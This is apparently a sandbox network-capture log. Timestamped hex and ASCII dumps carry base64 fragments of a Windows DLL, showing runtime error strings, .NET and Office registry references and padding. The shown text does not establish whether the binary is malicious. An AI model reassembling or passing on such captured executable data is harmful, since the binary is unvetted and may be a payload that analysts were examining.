                                                                  2023-04-26 07:00:14 UTC2441INData Raw: 2b 4e 54 57 44 70 53 4e 4c 36 2f 34 31 4e 65 4f 6c 41 30 76 72 2f 7a 4d 7a 4d 7a 4d 79 51 6b 49 74 55 4a 41 69 4e 51 67 79 4c 53 75 67 7a 79 4f 6a 6e 46 66 33 2f 69 34 71 63 41 41 41 41 4d 38 6a 6f 32 68 58 39 20 2f 37 68 41 48 77 6f 51 36 59 34 72 2f 66 2f 4d 6a 59 31 77 2f 2f 2f 2f 36 5a 56 37 2f 50 2b 4e 6a 58 54 2f 2f 2f 2f 70 2b 74 48 36 2f 34 31 4e 6a 4f 6e 79 30 66 72 2f 6a 55 32 6b 36 65 72 52 2b 76 2b 4e 54 62 7a 70 34 74 48 36 20 2f 34 31 4e 31 4f 6e 61 30 66 72 2f 7a 4d 7a 4d 7a 4d 79 51 6b 49 74 55 4a 41 69 4e 51 67 79 4c 69 6d 6a 2f 2f 2f 38 7a 79 4f 68 2b 46 66 33 2f 69 30 72 34 4d 38 6a 6f 64 42 58 39 2f 37 6a 49 48 77 6f 51 36 53 67 72 2f 66 2f 4d 20 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 47 6f 4d 69 30 58 6f 55 4f 68 6c 46 66 33 2f 67 38
                                                                  Data Ascii: +NTWDpSNL6/41NeOlA0vr/zMzMzMyQkItUJAiNQgyLSugzyOjnFf3/i4qcAAAAM8jo2hX9 /7hAHwoQ6Y4r/f/MjY1w////6ZV7/P+NjXT////p+tH6/41NjOny0fr/jU2k6erR+v+NTbzp4tH6 /41N1Ona0fr/zMzMzMyQkItUJAiNQgyLimj///8zyOh+Ff3/i0r4M8jodBX9/7jIHwoQ6Sgr/f/M zMzMzMzMzMzMzGoMi0XoUOhlFf3/g8
                                                                  2023-04-26 07:00:14 UTC2457INData Raw: 5a 70 62 47 55 67 5a 58 68 70 20 63 33 52 7a 41 47 5a 70 62 47 55 67 64 47 39 76 49 47 78 68 63 6d 64 6c 41 41 42 6d 61 57 78 6c 62 6d 46 74 5a 53 42 30 62 32 38 67 62 47 39 75 5a 77 41 41 41 47 5a 31 62 6d 4e 30 61 57 39 75 49 47 35 76 64 43 42 7a 64 58 42 77 20 62 33 4a 30 5a 57 51 41 41 47 68 76 63 33 51 67 64 57 35 79 5a 57 46 6a 61 47 46 69 62 47 55 41 41 41 41 41 61 57 52 6c 62 6e 52 70 5a 6d 6c 6c 63 69 42 79 5a 57 31 76 64 6d 56 6b 41 41 42 70 62 47 78 6c 5a 32 46 73 49 47 4a 35 20 64 47 55 67 63 32 56 78 64 57 56 75 59 32 55 41 41 41 42 70 62 6d 46 77 63 48 4a 76 63 48 4a 70 59 58 52 6c 49 47 6c 76 49 47 4e 76 62 6e 52 79 62 32 77 67 62 33 42 6c 63 6d 46 30 61 57 39 75 41 41 42 70 62 6e 52 6c 63 6e 4a 31 20 63 48 52 6c 5a 41 42 70 62 6e 5a 68 62
                                                                  Data Ascii: ZpbGUgZXhp c3RzAGZpbGUgdG9vIGxhcmdlAABmaWxlbmFtZSB0b28gbG9uZwAAAGZ1bmN0aW9uIG5vdCBzdXBw b3J0ZWQAAGhvc3QgdW5yZWFjaGFibGUAAAAAaWRlbnRpZmllciByZW1vdmVkAABpbGxlZ2FsIGJ5 dGUgc2VxdWVuY2UAAABpbmFwcHJvcHJpYXRlIGlvIGNvbnRyb2wgb3BlcmF0aW9uAABpbnRlcnJ1 cHRlZABpbnZhb
                                                                  2023-04-26 07:00:14 UTC2473INData Raw: 51 41 41 41 47 30 41 63 77 42 6a 41 47 38 41 63 67 42 6c 41 47 55 41 4c 67 42 6b 20 41 47 77 41 62 41 41 41 41 45 4e 76 63 6b 56 34 61 58 52 51 63 6d 39 6a 5a 58 4e 7a 41 41 41 41 41 41 41 41 32 47 63 46 45 41 41 41 41 41 41 4b 61 41 55 51 41 41 41 41 41 42 69 6c 42 52 42 44 70 51 55 51 2f 32 63 46 45 50 39 6e 20 42 52 44 35 51 41 55 51 55 55 45 46 45 4b 66 2f 42 52 43 34 2f 77 55 51 41 41 41 41 41 44 68 6f 42 52 41 2b 63 41 55 51 61 6e 41 46 45 50 2b 59 42 52 42 66 6d 51 55 51 30 2f 34 46 45 50 39 6e 42 52 41 57 2f 41 55 51 41 41 41 41 20 41 41 41 41 41 41 44 2f 5a 77 55 51 41 41 41 41 41 46 68 6f 42 52 41 41 41 41 41 41 51 57 67 46 45 50 39 6e 42 52 41 43 61 41 55 51 35 57 63 46 45 50 39 6e 42 52 44 67 37 41 63 51 34 4f 77 48 45 4f 54 73 42 78 44 6b 37
                                                                  Data Ascii: QAAAG0AcwBjAG8AcgBlAGUALgBk AGwAbAAAAENvckV4aXRQcm9jZXNzAAAAAAAA2GcFEAAAAAAKaAUQAAAAABilBRBDpQUQ/2cFEP9n BRD5QAUQUUEFEKf/BRC4/wUQAAAAADhoBRA+cAUQanAFEP+YBRBfmQUQ0/4FEP9nBRAW/AUQAAAA AAAAAAD/ZwUQAAAAAFhoBRAAAAAAQWgFEP9nBRACaAUQ5WcFEP9nBRDg7AcQ4OwHEOTsBxDk7
                                                                  2023-04-26 07:00:14 UTC2489INData Raw: 41 41 41 41 51 4a 37 69 50 77 41 41 41 41 44 41 69 4f 49 2f 41 41 41 41 41 45 42 7a 34 6a 38 41 41 41 41 41 51 46 37 69 50 77 41 41 20 41 41 42 41 53 65 49 2f 41 41 41 41 41 45 41 30 34 6a 38 41 41 41 41 41 77 42 2f 69 50 77 41 41 41 41 42 41 43 2b 49 2f 41 41 41 41 41 41 44 33 34 54 38 41 41 41 41 41 41 4f 50 68 50 77 41 41 41 41 41 41 7a 2b 45 2f 41 41 41 41 20 41 45 43 37 34 54 38 41 41 41 41 41 77 4b 66 68 50 77 41 41 41 41 42 41 6c 4f 45 2f 41 41 41 41 41 41 43 42 34 54 38 41 41 41 41 41 41 47 37 68 50 77 41 41 41 41 41 41 57 2b 45 2f 41 41 41 41 41 45 42 49 34 54 38 41 41 41 41 41 20 77 44 58 68 50 77 41 41 41 41 42 41 49 2b 45 2f 41 41 41 41 41 41 41 52 34 54 38 41 41 41 41 41 41 50 2f 67 50 77 41 41 41 41 41 41 37 65 41 2f 41 41 41 41 41 45 44 62
                                                                  Data Ascii: AAAAQJ7iPwAAAADAiOI/AAAAAEBz4j8AAAAAQF7iPwAA AABASeI/AAAAAEA04j8AAAAAwB/iPwAAAABAC+I/AAAAAAD34T8AAAAAAOPhPwAAAAAAz+E/AAAA AEC74T8AAAAAwKfhPwAAAABAlOE/AAAAAACB4T8AAAAAAG7hPwAAAAAAW+E/AAAAAEBI4T8AAAAA wDXhPwAAAABAI+E/AAAAAAAR4T8AAAAAAP/gPwAAAAAA7eA/AAAAAEDb
                                                                  2023-04-26 07:00:14 UTC2505INData Raw: 65 48 2f 57 64 6e 76 49 2f 56 52 4b 74 72 2b 67 53 68 6a 79 51 32 64 72 51 66 37 6a 79 50 36 4d 61 4f 4e 62 63 43 6b 47 38 43 77 50 6b 70 6f 58 53 38 6a 2f 55 51 64 74 55 52 77 4b 51 20 50 46 59 76 50 71 6d 76 37 50 49 2f 67 79 50 56 52 51 2f 4b 63 54 77 56 74 7a 45 4b 2f 67 62 7a 50 2b 53 43 4d 64 4a 71 39 49 59 38 4d 64 68 4d 2f 48 41 68 38 7a 39 38 42 42 69 4f 35 35 79 4b 50 50 38 57 5a 4c 49 49 50 50 4d 2f 20 70 56 6b 32 68 43 45 6e 6b 7a 7a 78 6e 35 4a 66 78 56 62 7a 50 79 68 47 54 6c 7a 75 58 49 75 38 79 36 6b 36 4e 36 64 78 38 7a 2f 68 36 6b 4b 2f 36 6a 71 57 76 47 62 59 42 57 32 75 6a 50 4d 2f 76 41 53 5a 50 49 32 56 6e 72 7a 33 20 6e 2b 55 30 32 36 66 7a 50 2b 4c 31 59 64 59 32 35 48 57 38 35 61 67 54 77 79 33 44 38 7a 2f 44 4b 56 30 33 2b 50 2b
                                                                  Data Ascii: eH/WdnvI/VRKtr+gShjyQ2drQf7jyP6MaONbcCkG8CwPkpoXS8j/UQdtURwKQ PFYvPqmv7PI/gyPVRQ/KcTwVtzEK/gbzP+SCMdJq9IY8MdhM/HAh8z98BBiO55yKPP8WZLIIPPM/ pVk2hCEnkzzxn5JfxVbzPyhGTlzuXIu8y6k6N6dx8z/h6kK/6jqWvGbYBW2ujPM/vASZPI2Vnrz3 n+U026fzP+L1YdY25HW85agTwy3D8z/DKV03+P+
                                                                  2023-04-26 07:00:14 UTC2521INData Raw: 6b 20 41 47 55 41 62 77 42 7a 41 41 41 41 55 41 42 31 41 47 49 41 62 41 42 70 41 47 4d 41 49 41 42 57 41 47 6b 41 5a 41 42 6c 41 47 38 41 63 77 41 41 41 48 73 41 51 51 42 46 41 44 55 41 4d 41 42 44 41 44 41 41 4f 41 41 78 41 43 30 41 20 52 51 42 43 41 45 51 41 4d 67 41 74 41 44 51 41 4d 77 41 34 41 45 45 41 4c 51 41 34 41 44 59 41 4e 51 41 31 41 43 30 41 4f 41 42 42 41 44 41 41 4f 51 41 79 41 45 55 41 4d 77 41 30 41 44 6b 41 4f 41 41 33 41 45 45 41 66 51 41 41 20 41 41 41 41 52 67 42 50 41 45 77 41 52 41 42 46 41 46 49 41 53 51 42 45 41 46 38 41 55 67 42 6c 41 47 4d 41 5a 51 42 75 41 48 51 41 41 41 42 53 41 47 55 41 59 77 42 6c 41 47 34 41 64 41 41 67 41 45 6b 41 64 41 42 6c 41 47 30 41 20 63 77 41 41 41 41 41 41 41 41 41 41 41 48 73 41 4f 41 42 42 41 45
                                                                  Data Ascii: k AGUAbwBzAAAAUAB1AGIAbABpAGMAIABWAGkAZABlAG8AcwAAAHsAQQBFADUAMABDADAAOAAxAC0A RQBCAEQAMgAtADQAMwA4AEEALQA4ADYANQA1AC0AOABBADAAOQAyAEUAMwA0ADkAOAA3AEEAfQAA AAAARgBPAEwARABFAFIASQBEAF8AUgBlAGMAZQBuAHQAAABSAGUAYwBlAG4AdAAgAEkAdABlAG0A cwAAAAAAAAAAAHsAOABBAE
                                                                  2023-04-26 07:00:14 UTC2537INData Raw: 38 41 61 77 42 63 41 45 6b 41 62 67 42 7a 41 48 51 41 20 59 51 42 73 41 47 77 41 55 67 42 76 41 47 38 41 64 41 42 63 41 46 41 41 59 51 42 30 41 47 67 41 41 41 41 41 41 41 41 41 41 41 42 49 41 45 73 41 54 41 42 4e 41 46 77 41 55 77 42 50 41 45 59 41 56 41 42 58 41 45 45 41 55 67 42 46 20 41 46 77 41 54 51 42 70 41 47 4d 41 63 67 42 76 41 48 4d 41 62 77 42 6d 41 48 51 41 58 41 42 50 41 47 59 41 5a 67 42 70 41 47 4d 41 5a 51 42 63 41 44 45 41 4e 51 41 75 41 44 41 41 58 41 42 44 41 47 38 41 62 51 42 74 41 47 38 41 20 62 67 42 63 41 45 6b 41 62 67 42 7a 41 48 51 41 59 51 42 73 41 47 77 41 55 67 42 76 41 47 38 41 64 41 42 63 41 46 59 41 61 51 42 79 41 48 51 41 64 51 42 68 41 47 77 41 58 41 42 57 41 47 6b 41 63 67 42 30 41 48 55 41 59 51 42 73 20 41 45 38 41 64
                                                                  Data Ascii: 8AawBcAEkAbgBzAHQA YQBsAGwAUgBvAG8AdABcAFAAYQB0AGgAAAAAAAAAAABIAEsATABNAFwAUwBPAEYAVABXAEEAUgBF AFwATQBpAGMAcgBvAHMAbwBmAHQAXABPAGYAZgBpAGMAZQBcADEANQAuADAAXABDAG8AbQBtAG8A bgBcAEkAbgBzAHQAYQBsAGwAUgBvAG8AdABcAFYAaQByAHQAdQBhAGwAXABWAGkAcgB0AHUAYQBs AE8Ad
                                                                  2023-04-26 07:00:14 UTC2553INData Raw: 41 41 41 41 41 41 41 51 51 42 4a 41 46 38 41 52 41 42 46 41 46 51 41 52 51 42 44 41 46 51 41 52 51 42 45 20 41 46 38 41 52 41 42 50 41 46 51 41 54 67 42 46 41 46 51 41 58 77 42 44 41 45 38 41 55 67 42 46 41 44 59 41 4e 41 42 66 41 46 59 41 52 51 42 53 41 46 4d 41 53 51 42 50 41 45 34 41 41 41 42 42 41 45 6b 41 58 77 42 45 41 45 55 41 20 56 41 42 46 41 45 4d 41 56 41 42 46 41 45 51 41 58 77 42 45 41 45 38 41 56 41 42 4f 41 45 55 41 56 41 42 66 41 46 59 41 52 51 42 53 41 46 4d 41 53 51 42 50 41 45 34 41 41 41 41 41 41 45 45 41 53 51 42 66 41 45 51 41 52 51 42 55 20 41 45 55 41 51 77 42 55 41 45 55 41 52 41 42 66 41 45 6b 41 52 51 42 66 41 46 59 41 52 51 42 53 41 46 4d 41 53 51 42 50 41 45 34 41 41 41 41 41 41 45 45 41 53 51 42 66 41 45 51 41 52 51 42 55 41
                                                                  Data Ascii: AAAAAAAQQBJAF8ARABFAFQARQBDAFQARQBE AF8ARABPAFQATgBFAFQAXwBDAE8AUgBFADYANABfAFYARQBSAFMASQBPAE4AAABBAEkAXwBEAEUA VABFAEMAVABFAEQAXwBEAE8AVABOAEUAVABfAFYARQBSAFMASQBPAE4AAAAAAEEASQBfAEQARQBU AEUAQwBUAEUARABfAEkARQBfAFYARQBSAFMASQBPAE4AAAAAAEEASQBfAEQARQBUA
                                                                  2023-04-26 07:00:14 UTC2569INData Raw: 41 47 73 41 65 51 41 74 41 45 73 41 52 77 41 41 41 48 4d 41 64 77 41 74 41 45 73 41 52 51 41 41 41 48 55 41 65 67 41 74 41 46 55 41 57 67 41 74 41 45 77 41 20 59 51 42 30 41 47 34 41 41 41 41 41 41 48 51 41 64 41 41 74 41 46 49 41 56 51 41 41 41 47 49 41 62 67 41 74 41 45 6b 41 54 67 41 41 41 48 41 41 59 51 41 74 41 45 6b 41 54 67 41 41 41 47 63 41 64 51 41 74 41 45 6b 41 54 67 41 41 20 41 48 51 41 59 51 41 74 41 45 6b 41 54 67 41 41 41 48 51 41 5a 51 41 74 41 45 6b 41 54 67 41 41 41 47 73 41 62 67 41 74 41 45 6b 41 54 67 41 41 41 47 30 41 62 41 41 74 41 45 6b 41 54 67 41 41 41 47 30 41 63 67 41 74 41 45 6b 41 20 54 67 41 41 41 48 4d 41 59 51 41 74 41 45 6b 41 54 67 41 41 41 47 30 41 62 67 41 74 41 45 30 41 54 67 41 41 41 47 4d 41 65 51 41 74 41 45 63 41
                                                                  Data Ascii: AGsAeQAtAEsARwAAAHMAdwAtAEsARQAAAHUAegAtAFUAWgAtAEwA YQB0AG4AAAAAAHQAdAAtAFIAVQAAAGIAbgAtAEkATgAAAHAAYQAtAEkATgAAAGcAdQAtAEkATgAA AHQAYQAtAEkATgAAAHQAZQAtAEkATgAAAGsAbgAtAEkATgAAAG0AbAAtAEkATgAAAG0AcgAtAEkA TgAAAHMAYQAtAEkATgAAAG0AbgAtAE0ATgAAAGMAeQAtAEcA
                                                                  2023-04-26 07:00:14 UTC2585INData Raw: 41 4c 6b 4e 53 56 43 52 59 54 45 45 41 41 41 41 41 6f 4c 51 48 41 41 51 41 41 41 41 75 51 31 4a 55 4a 46 68 4d 57 67 41 41 41 41 43 6b 74 41 63 41 42 41 41 41 41 43 35 44 55 6c 51 6b 57 46 42 42 41 41 41 41 20 41 4b 69 30 42 77 41 49 41 41 41 41 4c 6b 4e 53 56 43 52 59 55 46 67 41 41 41 41 41 73 4c 51 48 41 41 51 41 41 41 41 75 51 31 4a 55 4a 46 68 51 57 45 45 41 41 41 43 30 74 41 63 41 42 41 41 41 41 43 35 44 55 6c 51 6b 57 46 42 61 20 41 41 41 41 41 4c 69 30 42 77 41 45 41 41 41 41 4c 6b 4e 53 56 43 52 59 56 45 45 41 41 41 41 41 76 4c 51 48 41 41 51 41 41 41 41 75 51 31 4a 55 4a 46 68 55 57 67 41 41 41 41 44 41 74 41 63 41 41 48 49 42 41 43 35 79 5a 47 46 30 20 59 51 41 41 77 43 59 4a 41 42 67 41 41 41 41 75 63 6d 52 68 64 47 45 6b 56 41 41 41 41 41 44
                                                                  Data Ascii: ALkNSVCRYTEEAAAAAoLQHAAQAAAAuQ1JUJFhMWgAAAACktAcABAAAAC5DUlQkWFBBAAAA AKi0BwAIAAAALkNSVCRYUFgAAAAAsLQHAAQAAAAuQ1JUJFhQWEEAAAC0tAcABAAAAC5DUlQkWFBa AAAAALi0BwAEAAAALkNSVCRYVEEAAAAAvLQHAAQAAAAuQ1JUJFhUWgAAAADAtAcAAHIBAC5yZGF0 YQAAwCYJABgAAAAucmRhdGEkVAAAAAD
                                                                  2023-04-26 07:00:14 UTC2601INData Raw: 55 71 41 59 51 69 51 41 41 20 41 4a 36 6f 42 68 43 4c 41 41 41 41 71 4b 67 47 45 49 73 41 41 41 43 79 71 41 59 51 67 77 41 41 41 4c 79 6f 42 68 43 4f 41 41 41 41 78 71 67 47 45 49 34 41 41 41 44 51 71 41 59 51 6b 41 41 41 41 4e 71 6f 42 68 43 51 41 41 41 41 20 35 4b 67 47 45 4a 49 41 41 41 44 75 71 41 59 51 6b 67 41 41 41 50 69 6f 42 68 43 55 41 41 41 41 41 71 6b 47 45 4a 51 41 41 41 41 4d 71 51 59 51 6c 67 41 41 41 42 61 70 42 68 43 4f 41 41 41 41 49 4b 6b 47 45 49 4d 41 41 41 41 71 20 71 51 59 51 6d 51 41 41 41 44 53 70 42 68 43 5a 41 41 41 41 50 71 6b 47 45 4a 73 41 41 41 42 49 71 51 59 51 6d 77 41 41 41 46 4b 70 42 68 43 64 41 41 41 41 58 4b 6b 47 45 4a 30 41 41 41 42 6d 71 51 59 51 6e 77 41 41 41 48 43 70 20 42 68 43 66 41 41 41 41 65 71 6b 47 45 4b
                                                                  Data Ascii: UqAYQiQAA AJ6oBhCLAAAAqKgGEIsAAACyqAYQgwAAALyoBhCOAAAAxqgGEI4AAADQqAYQkAAAANqoBhCQAAAA 5KgGEJIAAADuqAYQkgAAAPioBhCUAAAAAqkGEJQAAAAMqQYQlgAAABapBhCOAAAAIKkGEIMAAAAq qQYQmQAAADSpBhCZAAAAPqkGEJsAAABIqQYQmwAAAFKpBhCdAAAAXKkGEJ0AAABmqQYQnwAAAHCp BhCfAAAAeqkGEK
                                                                  2023-04-26 07:00:14 UTC2617INData Raw: 62 6a 42 68 42 76 41 41 41 41 6b 4f 4d 47 45 47 38 41 41 41 43 61 34 77 59 51 20 63 51 41 41 41 4b 54 6a 42 68 42 78 41 41 41 41 72 75 4d 47 45 48 4d 41 41 41 43 34 34 77 59 51 63 77 41 41 41 4d 4c 6a 42 68 42 72 41 41 41 41 7a 4f 4d 47 45 48 59 41 41 41 44 57 34 77 59 51 64 67 41 41 41 4f 44 6a 42 68 42 34 20 41 41 41 41 36 75 4d 47 45 48 67 41 41 41 44 30 34 77 59 51 65 67 41 41 41 50 37 6a 42 68 42 36 41 41 41 41 43 4f 51 47 45 48 77 41 41 41 41 53 35 41 59 51 66 41 41 41 41 42 7a 6b 42 68 42 2b 41 41 41 41 4a 75 51 47 45 48 59 41 20 41 41 41 77 35 41 59 51 49 67 57 54 47 61 77 41 41 41 41 49 6c 77 6b 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 2f 2f 2f 2f 39 67 35 41 59 51 2f 2f
                                                                  Data Ascii: bjBhBvAAAAkOMGEG8AAACa4wYQ cQAAAKTjBhBxAAAAruMGEHMAAAC44wYQcwAAAMLjBhBrAAAAzOMGEHYAAADW4wYQdgAAAODjBhB4 AAAA6uMGEHgAAAD04wYQegAAAP7jBhB6AAAACOQGEHwAAAAS5AYQfAAAABzkBhB+AAAAJuQGEHYA AAAw5AYQIgWTGawAAAAIlwkQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////9g5AYQ//
                                                                  2023-04-26 07:00:14 UTC2633INData Raw: 42 34 48 45 46 73 41 41 41 42 79 48 67 63 51 57 77 41 41 41 48 77 65 42 78 42 6d 41 41 41 41 68 68 34 48 45 47 59 41 41 41 43 51 20 48 67 63 51 61 41 41 41 41 4a 6f 65 42 78 42 6f 41 41 41 41 70 42 34 48 45 47 6f 41 41 41 43 75 48 67 63 51 61 67 41 41 41 4c 67 65 42 78 42 73 41 41 41 41 77 68 34 48 45 47 77 41 41 41 44 4d 48 67 63 51 62 67 41 41 41 4e 59 65 20 42 78 42 6d 41 41 41 41 34 42 34 48 45 47 59 41 41 41 44 71 48 67 63 51 63 51 41 41 41 50 51 65 42 78 42 78 41 41 41 41 2f 68 34 48 45 48 4d 41 41 41 41 49 48 77 63 51 63 77 41 41 41 42 49 66 42 78 42 31 41 41 41 41 48 42 38 48 20 45 48 55 41 41 41 41 6d 48 77 63 51 64 77 41 41 41 44 41 66 42 78 42 33 41 41 41 41 4f 68 38 48 45 48 6b 41 41 41 42 45 48 77 63 51 63 51 41 41 41 45 34 66 42 78 42 78 41
                                                                  Data Ascii: B4HEFsAAAByHgcQWwAAAHweBxBmAAAAhh4HEGYAAACQ HgcQaAAAAJoeBxBoAAAApB4HEGoAAACuHgcQagAAALgeBxBsAAAAwh4HEGwAAADMHgcQbgAAANYe BxBmAAAA4B4HEGYAAADqHgcQcQAAAPQeBxBxAAAA/h4HEHMAAAAIHwcQcwAAABIfBxB1AAAAHB8H EHUAAAAmHwcQdwAAADAfBxB3AAAAOh8HEHkAAABEHwcQcQAAAE4fBxBxA
                                                                  2023-04-26 07:00:14 UTC2649INData Raw: 41 41 41 41 41 41 41 41 41 50 2f 2f 2f 2f 2b 69 56 77 63 51 41 41 41 41 41 4a 42 58 42 78 41 69 42 5a 4d 5a 41 67 41 41 41 46 44 31 43 52 41 42 41 41 41 41 59 50 55 4a 45 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 44 2f 2f 2f 2f 2f 41 41 41 41 41 50 2f 2f 2f 2f 38 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 41 51 41 41 41 48 54 31 43 52 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 43 50 39 67 49 51 49 67 57 54 47 51 49 41 41 41 43 6f 39 51 6b 51 41 51 41 41 41 4c 6a 31 43 52 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 2f 2f 2f 2f 77 41 41 41 41 44 2f 2f 2f 2f 2f 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 45 41 41 41 44 4d 39 51 6b 51 41 41 41 41 41 41 41 41
                                                                  Data Ascii: AAAAAAAAAP////+iVwcQAAAAAJBXBxAiBZMZAgAAAFD1CRABAAAAYPUJEAAA AAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAAAAAAABAAAAAQAAAHT1CRAAAAAAAAAA AAAAAACP9gIQIgWTGQIAAACo9QkQAQAAALj1CRAAAAAAAAAAAAAAAAAAAAAA/////wAAAAD///// AAAAAAAAAAAAAAAAAQAAAAEAAADM9QkQAAAAAAAA
                                                                  2023-04-26 07:00:14 UTC2665INData Raw: 20 42 78 41 42 41 41 41 41 49 4a 45 48 45 41 45 41 41 41 41 6f 6b 51 63 51 41 77 41 41 41 44 43 52 42 78 41 44 41 41 41 41 53 5a 45 48 45 41 4d 41 41 41 42 52 6b 51 63 51 41 77 41 41 41 47 71 52 42 78 41 44 41 41 41 41 63 70 45 48 20 45 41 4d 41 41 41 42 36 6b 51 63 51 41 77 41 41 41 49 4b 52 42 78 41 44 41 41 41 41 69 70 45 48 45 41 4d 41 41 41 43 53 6b 51 63 51 44 41 41 41 41 4a 71 52 42 78 41 4d 41 41 41 41 6f 70 45 48 45 41 45 41 41 41 43 71 6b 51 63 51 20 2f 2f 2f 2f 2f 37 4b 52 42 78 41 69 42 5a 4d 5a 42 67 41 41 41 42 51 6c 43 68 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 44 2f 2f 2f 2f 2f 34 4a 45 48 45 41 41 41 41 41 44 6f 20 6b 51 63 51 41 51 41 41 41 50 43 52 42 78 41 42 41 41 41 41 41 4a 49
                                                                  Data Ascii: BxABAAAAIJEHEAEAAAAokQcQAwAAADCRBxADAAAASZEHEAMAAABRkQcQAwAAAGqRBxADAAAAcpEH EAMAAAB6kQcQAwAAAIKRBxADAAAAipEHEAMAAACSkQcQDAAAAJqRBxAMAAAAopEHEAEAAACqkQcQ /////7KRBxAiBZMZBgAAABQlChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////4JEHEAAAAADo kQcQAQAAAPCRBxABAAAAAJI
                                                                  2023-04-26 07:00:14 UTC2681INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 42
                                                                  Data Ascii: AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAB
                                                                  2023-04-26 07:00:14 UTC2697INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                  2023-04-26 07:00:14 UTC2713INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 63 68 51 67 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAchQgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
